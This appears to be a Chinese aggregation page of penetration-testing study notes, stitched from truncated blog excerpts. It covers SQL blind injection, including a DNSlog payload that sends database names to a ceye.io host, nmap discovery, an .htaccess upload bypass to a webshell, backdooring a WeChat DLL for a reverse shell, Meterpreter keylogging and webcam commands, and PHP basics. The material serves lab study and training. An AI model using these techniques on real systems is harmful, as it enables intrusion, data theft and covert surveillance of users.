渗透测试

时间盲注 原理：构造语句，通过页面响应的时长，来判断信息。 方法：构造逻辑语句，通过条件语句进行判断，为真则立即执行，否则延时执行 核心语法： if(left(user(),1)='a',0,sleep(3)); Dnslog 盲注 dnslog是用户访问网站过程中被dns服务记录的信息 原理： 通过布尔或时间盲注效率很低，需要发送很多的请求进行判断，很可能触发安全设备的防护，我们需要一种方式，减少请求，直接回显数据，这里就使用dnslog实现注入。 dnslog平台 ：http://ceye.io/ mysql LOAD_FILE函数可以发起请求： SELECT LOAD_FILE(CONCAT('\\\\','test','.mysql.d1egqb.ceye.io\\abc')); 方法： 构造语句，利用load_file()函数发起请求，使用dnslog接受请求，获取数据 核心语法： SELECT LOAD_FILE(CONCAT('\\\\',select database()),'.mysql.d1egqb.ceye.io\\abc')); load_file()函数只能在windows操作系统上使用，linux操作系统不能使用 来源： https://www.cnblogs.com/liuyuanzzz/p/11679925.html

1. 实验环境 靶机：CentOS 6.7，IP地址为：192.168.37.137 攻击机：Kali，IP地址为：192.168.37.131 运行环境：VMware 2. 实验步骤 信息收集 （1）查询攻击机Kali的IP地址 （2）识别存活的主机，发现攻击的目标 （注：二、三、四层发现的目的都是识别存活的主机，选择适合的一种方式即可） 2.1> 二层发现 可以使用nmap进行二层的主机发现 nmap -sn 192.168.37.0/24 也可以使用netdiscover进行二层的主机发现 2.2> 三层发现 可以使用ping命令进行三层的主机发现，但是ping命令无法一次性实现多个IP的扫描，但可以配合shell脚本实现整个局域网内的扫描； 当然也可以使用scapy，nmap，fping，hping3等进行三层的主机发现； 2.3> 四层发现 可以使用nmap进行四层的主机发现，包括UDP扫描和TCP扫描； nmap 192.168.37.0/24 -PU53543 -sn #使用UDP的方式去扫描多个主机，当返回端口不可达时，即主机存活； nmap 192.168.37.0/24 -PA445 -sn #使用ACK的方式去扫描多个主机，当收到RST包时，目标主机存活； 当然也可以使用scapy，hping3等进行四层的主机发现 （3）端口扫描 （注

在一次测试中遇到一个有趣的文件上传漏洞，通过黑盒加白盒测试成功绕过限制获取到Webshell，本次测试所用的环境均为自己搭建的测试环境。 上传点在上传主题文件处，首先我们来上传php文件提示上传失败。 结合代码分析此处上传点，发现代码中判断上传文件是否为压缩文件，如果文件后缀不是.tar.gz或.zip文件则提示上传失败。 在判断程序是否为压缩文件后，进而判断文件体积是否符合，如果体积符合则上传文件并调用相关解压类进行解压，在解压后删除压缩包文件。文件保存目录以压缩包文件名:\themes\压缩文件名\ 思路1：通过在压缩包中放置shell文件，程序自动解压就拿到shell了。 然后在我们访问shell文件后，才发现并没有想象的可以成功执行代码。 我们再来结合环境分析下此处，发现在\data\themes目录下存在.htaccess文件重写了php、phtml文件，没有执行权限。 思路2：在压缩包中放置.htaccess和shell文件，重新定义php文件解析权限。 成功执行代码。 总结：在实际的渗透测试中由于目标环境多样化和复杂化，要综合利用多种漏洞和技术手段才能达到目的。但是漏洞种类繁多，技术水平较弱，难以达到理想的结果。 来源： https://www.cnblogs.com/wjw-zm/p/11677057.html

目录 信息收集 DNS域名信息的收集 整站分析 服务器类型(Linux/Windows) 网站容器(Apache/Nginx/Tomcat/IIS) 脚本类型(php/jsp/asp) 数据库类型(Mysql/Oracle/Accees/Mqlserver) 主机扫描(Nessus) 端口扫描(nmap) 网站后台目录 旁站和C段扫描 网站漏洞扫描 信息收集 信息收集对于渗透测试前期来说是非常重要的，因为只有我们掌握了目标网站或目标主机足够多的信息之后，我们才能更好地对其进行漏洞检测。正所谓，知己知彼百战百胜！ 信息收集的方式可以分为两种：主动和被动。 主动信息收集：通过直接访问、扫描网站，这种流量将流经网站 被动信息收集：利用第三方的服务对目标进行访问了解，比例：Google搜索、Shodan搜索等 传送门： Google Hacking的用法 Shodan的使用 没有一种方式是最完美的，每个方式都有自己的优势，主动方式，你能获取更多的信息，但是目标主机可能会记录你的操作记录。被动方式，你收集的信息会相对较少，但是你的行动并不会被目标主机发现。一般在一个渗透项目下，你需要有多次的信息收集，同时也要运用不同的收集方式，才能保证信息收集的完整性。 而信息收集到底要收集哪些信息呢？接下来，我就给大家整理了一下，渗透测试中常见的一些需要收集的信息。 DNS域名信息的收集

（本文仅为平时学习记录，若有错误请大佬指出，如果本文能帮到你那我也是很开心啦） 一、环境 攻击者：kali系统 安装后门工具 The-Backdoor-Factory（DLL劫持） 靶机：Win 7系统 安装ProcessExplorer，安装微信 ProcessExplorer： 任务管理工具，看到当前系统中所有运行的程序（在溯源、任务管理中很好用） 二、微信DLL劫持反弹shell 1.保证攻击者与靶机互通 2.在Win7中打开ProcessExplorer，打开微信，并在ProcessExplorer中找到WeChat.exe，点击WeChat.exe，点击菜单栏中的View --> Lower Pane View --> DLLs 点击DLLs后，在窗口下方出现了很多.dll文件，这些.dll文件就是当前微信在启动过程中所需要动态链接库文件， 3.在ProcessExplorer找到安装在微信里面的动态链接库文件，选择libEGL.dll动态链接库文件，找到libEGL.dll文件所在位置，将libEGL.dll文件拷贝到kali中的The-Backdoor-Factory后门工具所在的文件夹内，并关闭微信 点击Path，排在前面的.dll文件就是安装在微信里的或者看路径是否在安装路径下 4.打开kali，进入The-Backdoor-Factory后门工具所在的文件夹内

09.23 - 09.26|Xianyu233 2019/9/26 一个普通人的爱好 # OSI 七层网络模型 OSI七层网络模型 tcp/ip四层概念模型 对应的网络协议 应用层 应用层 HTTP FTP DNS 表示层 会话层 传输层 传输层 TCP UDP SCTP RTP 网络层 网络层 IP ARP RARP ICMP IGMP 数据链路层 网络接口层 物理层 # Msfconsole 使用笔记 Mestaploit是一款开源的安全漏洞漏洞检测工具 # 常用命令 background //处于后台 session -i index //与会话进行交互 quit //推出会话 shell //获得控制台权限 upload /root/Desktop/netcat.exe c:\\ //上传文件到目标 download nimeia.txt /root/Desktop //下载文件到本机 execute -H -i -f cmd.exe //创建新进程cmd.exe sysionfo //查看目标系统信息 shutdown //关机 keyscan_start //开启键盘记录 keyscan_dump //提取键盘记录 keyscan_stop //关闭键盘记录 webscam_snap //从指定的摄像头拍摄照片 # 可以利用的模块 445 端口 : exploit

header（"Content-Type:text/html;charst="utf-8"）设置头部信息,解决编码问题 setcookie("loginString",$value,0,"/","localhost",false,true); 参数说明第一个参数指定cookie的标识符key 第二个参数指定cookie的值 第三个参数指定cookie生存期 第四个参数指定，该cookie的作用域，将在Cookie上可用的服务器上的路径。 如果设置为“/”，cookie将在整个域中可用。如果设置为'/fo/'， cookie将只在/fo/Directory和所有子目录（如/Fo/Bar /域）中可用。 默认值是正在设置Cookie的当前目录。 第五个参数,domain，对哪个域设置一个cookie 第六个参数规定是否通过安全的 HTTPS 连接来传输 cookie 第七个参数用于指定，该cookie的属性是否是http-only，意思是无法通过js代码来获取cookie值 php文件上传 有关上面的 HTML 表单的一些注意项列举如下： <form> 标签的 enctype 属性规定了在提交表单时要使用哪种内容类型。在表单需要二进制数据时，比如文件内容，请使用 "multipart/form-data"。 <input> 标签的 type="file"

the-backdoor-factory-master（后门工制造厂）原理：可执行二进制文件中有大量的00，这些00是不包含数据的，将这些数据替换成payload，并且在程序执行的时候，jmp到代码段，来触发payload。 测试靶机环境，win7系统，wechat(微信)2.6.8 靶机ip:192.168.190.129 目标：利用the-backdoor-factory-master对微信自己的dll动态连接文件植入后门，等微信运行之后，反弹shell到攻击机 1，靶机安装微信，记录下安装路径 2，使用Process Explorer进程管理器，找到微信进程，查看微信运行所需要的dll文件，找到微信安装路径下的任意一个文件，本次实验将利用libeay32.dll文件 3，将文件复制到kali下任意目录，我直接复制到the-backdoor-factory-master下方便使用 4，运行the-backdoor-factory-master，输入命令，./backdoor.py -f libeay32.dll，查找可利用的pyload，可以看到检测到了，有不少可植入的pyload 5，因为这次目的是获得shell，所以选择使用reverse_shell_tcp_lnline这个pyload，输入命令./backdoor.py -f libeay32.dll -s

目录 渗透测试实战第三版学习笔记(一) 介绍 第一章赛前准备--安装 APT攻击基本介绍 假定攻破练习 设定行动 设置外部服务器 渗透测试实战第三版学习笔记(一) 介绍 红队： 任务是模仿入侵者的TTP（战术和技术手段）； 目的是测出公司应对入侵事件的真实状况，查找出安全计划中的问题及员工对安全项目理解的不足之处，最终目的是提高员工对安全计划的理解； 尽可能不被发现，不对内网进行大规模漏扫； 测试时间周期较长，两周-六个月； 模拟真实的攻击、社会工程学、远控木马等； 模拟攻击的结果是要针对制定的安全技术。 渗透测试与红队的区别如下图所示： TTD--检测时效--从入侵事件的初始发生到安全分析分院检测并开始处理入侵事件之间的时间。 TTM--缓解时效--测试记录的次要指标。 第一章赛前准备--安装 关注攻击手法 高级威胁组织的TTP（Tactics、Techniques & Procedures）--策略、技巧、程序 火眼(FireEye)威胁情报分析报告：该威胁组织使用推特作为C2 服务器（Command and Contr ol--命令控制服务器），也使用了github 作为存储加密图片和经过信息隐写文件的仓库。 https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf APT攻击基本介绍

php面向对象基础 ->调用符号 构造函数construct，主要用来创建对象时初始化对象，为成员变量赋初始值，总与new运算符一起使用在创建对象的语句中 析构函数destructor,与构造函数相反，当对象结束其生命周期时，系统自动执行析构函数，__destruct 继承，php使用关键字extends来继承一个类，php不支持多继承，class child extends parent{代码} 属性的访问控制，php对属性或方法的访问控制，是通过在前面添加关键字public公有，protected受保护，或private私有来实现 public公有，公有的类成员可以在任何地方被访问 protected受保护，受保护的类成员可以被其自身以及其子类和父类访问 private私有，私有的类成员只能被其定义所在的类访问 接口：可以指定某个类必需实现哪些方法，但不需要定义这些方法的具体内容，interface定义接口，要使用接口用implements，类必需实现接口中定义的所有方法，否则会报错，类可以实现多个接口，用逗号来隔开 php表单 html form 表单action表示提交到哪个页面，method表示使用什么提交方式 服务器接收用户发来的表单数据的方式：$_GET get,$_POST post,$_COOKIE cookie，$_REQUEST 用户发来的数据